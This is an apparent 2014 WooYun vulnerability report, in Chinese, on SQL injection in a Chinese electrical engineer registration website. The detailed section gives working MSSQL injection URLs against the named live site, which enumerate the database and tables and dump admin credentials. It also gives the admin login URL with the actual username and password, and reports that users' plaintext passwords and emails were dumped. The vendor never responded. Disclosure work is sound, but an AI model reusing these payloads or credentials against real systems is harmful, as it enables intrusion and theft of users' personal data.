漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-056981
漏洞标题:中国电气注册工程师网SQL注入+后台+信息泄露
相关厂商:中国电气注册工程师网
漏洞作者: PythonPig
提交时间:2014-04-14 11:44
修复时间:2014-05-29 11:45
公开时间:2014-05-29 11:45
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
不知道这个站现在哪个部门在维护,就提给cncert了,把用户的数据全都暴露了~~
主办:全国勘察设计注册工程师电气专业管理委员会
承办:北京博超时代软件有限公司
详细说明:
注入点看过来:http://www.cceen.com/showinfo.asp?o=88 只是做了简单的测试,没有做任何坏事~~~
今天大周末的天气不错,看到个站,竟然可以注入~~直接手工吧,我太懒不想开工具了~~
一、测试了下,是MSSQL啊:http://www.cceen.com/showinfo.asp?o=88 and (select count(*) from sysobjects)>0,那就开始爆库吧~~~
二、直接爆库,希望别太多,手工爆着麻烦~~:http://www.cceen.com/showinfo.asp?o=88 and db_name(1)>0-- 哈哈,看看下图,爆出了个master,一看名字就知道了,你懂的
三、竟然让我得到了这么一个可爱的裤子,那就来看看里面有什么表老~http://www.cceen.com/showinfo.asp?o=88 and (select top 1 name from sysobjects where xtype=char(85))>0--
四、又看到了一个adminuser的表,这下看来又有戏了,管理员,你快出来吧~~直接爆adminuser中的用户名和密码:
五、看到admin都出来了,就找了一下后台登录试试吧:http://www.cceen.com/admin/admin_Login.asp 用户名:admin 密码:admin123,直接登录成功,进入了后台
我只是试试能不能进来,别的坏事真的啥也没干~~
六:看到还有很多裤子,还有个userdata的表,表示手工注入有点累了,还是用工具跑下吧:用户名、密码(明文哟亲)、邮箱,全都出来了。直接贴上跑出来的结果吧:
漏洞证明:
见 详细说明
修复方案:
过滤
密码加密
修改管理员密码
版权声明:转载请注明来源 PythonPig@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝